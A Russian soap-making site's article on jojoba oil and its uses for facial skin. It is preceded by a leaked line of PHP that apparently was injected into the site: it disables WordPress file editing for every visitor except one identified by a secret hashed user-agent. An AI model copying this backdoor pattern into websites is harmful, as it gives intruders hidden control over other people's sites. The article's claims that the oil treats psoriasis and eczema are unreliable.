if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Масло жожоба | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Масло жожоба

Возможно, будет не совсем правильным называть масло жожобы маслом, так как, по сути, оно является жидким воском, но, тем не менее, все называют его именно «масло жожоба», и мы также не будем от этого откланяться

Ингридиенты для мыла - масло жожоба Ингридиенты для мыла - масло жожоба

Воз­мож­но, будет не совсем пра­виль­ным назы­вать мас­ло жож­о­бы мас­лом, так как, по сути, оно явля­ет­ся жид­ким вос­ком, но, тем не менее, все назы­ва­ют его имен­но «мас­ло жожо­ба», и мы так­же не будем от это­го откланяться.

Мас­ло жож­о­бы явля­ет­ся поис­ти­не уни­каль­ным и нату­раль­ным про­дук­том, кото­рый полу­ча­ют из пло­дов веч­но­зе­ле­но­го кустар­ни­ка (Simmondsie chinensis), рас­ту­ще­го в жар­ких и засуш­ли­вых угол­ках наше­го зем­но­го шара (север Мек­си­ки, Ари­зо­на, Кали­фор­ния, и дру­гих). Ореш­ки жожо­ба, кото­рые дает этот кустар­ник, соби­ра­ют­ся вруч­ную, и содер­жат в себе око­ло 50% вос­ка, полу­ча­е­мо­го в даль­ней­шем путем холод­но­го прес­со­ва­ния. Уже гото­вое мас­ло жожо­ба име­ет золо­ти­сто-жел­тый цвет, густую и жид­кую кон­си­стен­цию при ком­нат­ной тем­пе­ра­ту­ре (кото­рая обыч­но засты­ва­ет при тем­пе­ра­ту­ре от 0 гра­ду­сов, и ниже), и прак­ти­че­ски не име­ет запаха.

По сво­им свой­ствам мас­ло жож­о­бы очень схо­же с таким ком­по­нен­том как спер­ма­цет, кото­рый широ­ко исполь­зу­ют в про­из­вод­стве кос­ме­ти­че­ских средств для ухо­да за кожей лица. Так­же в его состав вхо­дят ами­но­кис­ло­ты и про­те­ин, кото­рый опять же сво­и­ми свой­ства­ми напо­ми­на­ет белок кол­ла­ген, необ­хо­ди­мый для под­дер­жа­ния упру­го­сти и эла­стич­но­сти нашей кожи. Этим в боль­шей сте­пе­ни и объ­яс­ня­ет­ся такая попу­ляр­ность при­ме­не­ния мас­ла жожо­ба для лица, о полез­ных свой­ствах кото­ро­го, и спо­со­бах исполь­зо­ва­ния и пой­дет далее речь.

В мас­ле жожо­ба име­ет­ся доволь­но таки высо­кий про­цент содер­жа­ния вита­ми­на E, кото­рый сти­му­ли­ру­ет про­цесс реге­не­ра­ции кле­ток кожи, тем самым про­дле­вая ее моло­дость. Так­же оно обла­да­ет хоро­шей спо­соб­но­стью глу­бо­ко про­ни­кать в клет­ки кожи, обра­зо­вы­вая на ней сво­е­го рода плен­ку, кото­рая помо­га­ет удер­жи­вать вла­гу, пре­пят­ствуя иссу­ше­нию и шелу­ше­нию кожи.

Поми­мо сво­их отмен­ных пита­тель­ных, увлаж­ня­ю­щих, и омо­ла­жи­ва­ю­щих свойств, мас­ло жожо­ба обла­да­ет хоро­шим про­ти­во­вос­па­ли­тель­ным дей­стви­ем, и его успеш­но мож­но при­ме­нять при нали­чии пры­щей на коже, дер­ма­ти­те, псо­ри­а­зе, и дру­гих кож­ных заболеваниях.

Показания к применению масла жожоба для лица

- Мас­ло жож­о­бы может при­ме­нять­ся для улуч­ше­ния состо­я­ния любо­го типа кожи, но осо­бен­но эффек­тив­но его исполь­зо­ва­ние при сухой и шелу­ша­щей­ся коже, а так­же при уже увя­да­ю­щей, поте­ряв­шей упру­гость, дряб­лой кожи, с явны­ми при­зна­ка­ми ста­ре­ния (мор­щи­ны и т.д.). Мас­ло жожо­ба заме­ча­тель­но пита­ет, смяг­ча­ет, и на дол­гое вре­мя увлаж­ня­ет кожу, уби­ра­ет ее шелу­ше­ние, повы­ша­ет упру­гость и эла­стич­ность кож­ных покро­вов, раз­гла­жи­ва­ет име­ю­щи­е­ся на лице морщинки;

- Не менее эффек­тив­но при­ме­не­ние мас­ла жожо­ба для лица при ухо­де за чув­стви­тель­ной кожей, склон­ной к посто­ян­ным раз­дра­же­ни­ям и покрас­не­ни­ям (обла­да­ет успо­ка­и­ва­ю­щим действием);

- Так­же  мас­ло жож­о­бы хоро­шо при­ме­нять при про­блем­ной коже, пора­жен­ной пры­ща­ми и угря­ми (предот­вра­ща­ет появ­ле­ния новых пры­щей, и помо­га­ет изба­вить­ся от уже име­ю­щих­ся), а так­же и при дру­гих вос­па­ле­ни­ях и забо­ле­ва­ни­ях кожи (экзе­ма, ней­ро­дер­мит, дер­ма­тит, псориаз).

- Неза­ме­ни­мым сред­ством явля­ет­ся мас­ло жожо­ба и в ухо­де за кожей вокруг глаз (помо­га­ет раз­гла­дить неглу­бо­кие «гуси­ные лап­ки» в угол­ках глаз, мор­щин­ки под гла­за­ми, хоро­шо увлаж­ня­ет и пита­ет кожу век);

- Кро­ме все­го пере­чис­лен­но­го выше, при­ме­не­ние мас­ла жожо­ба помо­га­ет улуч­шить цвет лица, вырав­ни­вая при этом кожу, и спо­соб­ству­ет луч­ше­му усво­е­нию кожей вита­ми­на D при воз­дей­ствии сол­неч­ных лучей;

- Так­же мас­ло жожо­ба может исполь­зо­вать­ся после уда­ле­ния волос на лице(сбривание, выщи­пы­ва­ние), помо­гая устра­нить воз­мож­ные раз­дра­же­ния кожи. Ну и, конеч­но же, его мож­но при­ме­нять для сма­зы­ва­ния пере­су­шен­ных, обвет­рен­ных и потрес­кав­ших­ся губ.

Способы применения масла жожоба для лица

Так как мас­ло жож­о­бы име­ет доволь­но таки густую кон­си­стен­цию, при­ме­нять его в чистом нераз­бав­лен­ном виде для лица реко­мен­ду­ет­ся толь­ко на неболь­ших его участ­ках кожи. Напри­мер, если на неко­то­рых местах кожи лица у вас име­ет­ся шелу­ше­ние, необ­хо­ди­мо сма­зы­вать их мас­лом жожо­ба по несколь­ко раз в день. То же самое каса­ет­ся про­блем­ной кожи, с нали­чи­ем пры­щей и дру­гих кож­ных забо­ле­ва­ний, т.е. сма­зы­вать чистым мас­лом реко­мен­ду­ет­ся толь­ко пора­жен­ные участ­ки кожи.

При ухо­де за кожей вокруг глаз, нераз­бав­лен­ное мас­ло жож­о­бы мож­но нано­сить на име­ю­щи­е­ся мор­щин­ки в угол­ках глаз, и акку­рат­но вби­вать его в кожу. Но исполь­зо­вать чистое мас­ло под гла­за­ми все же неже­ла­тель­но, так как оно может ока­зать­ся слиш­ком тяже­лым. Поэто­му в этом слу­чае его луч­ше раз­ве­сти в про­пор­ции 1:2 с более лег­ким нату­раль­ным мас­лом (мас­ло шипов­ни­ка, косточ­ко­вые мас­ла и т.д.).

Для того, что­бы пол­но­стью сма­зы­вать лицо мас­лом, исполь­зуя его вме­сто кре­ма при сухой и увя­да­ю­щей коже, его так­же жела­тель­но раз­во­дить с более лег­ки­ми по кон­си­стен­ции мас­ла­ми, в про­пор­ци­ях 1:2, или же даже 1:3. В каче­стве таких лег­ких масел хоро­шо подой­дет мас­ло вино­град­ных, пер­си­ко­вых и абри­ко­со­вых косто­чек, мин­даль­ное мас­ло, мас­ло шипов­ни­ка и неко­то­рые другие.

Так­же мож­но при­ме­нять чистое мас­ло жожо­ба для лица, для всей его обла­сти, но толь­ко исполь­зуя его как мас­ку (нане­сти мас­ло на лицо, и смыть через 15–20 минут). А еще луч­ше добав­лять его (не более 1 чай­ной лож­ки) в абсо­лют­но любые соста­вы домаш­них масок для всех типов кожи.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!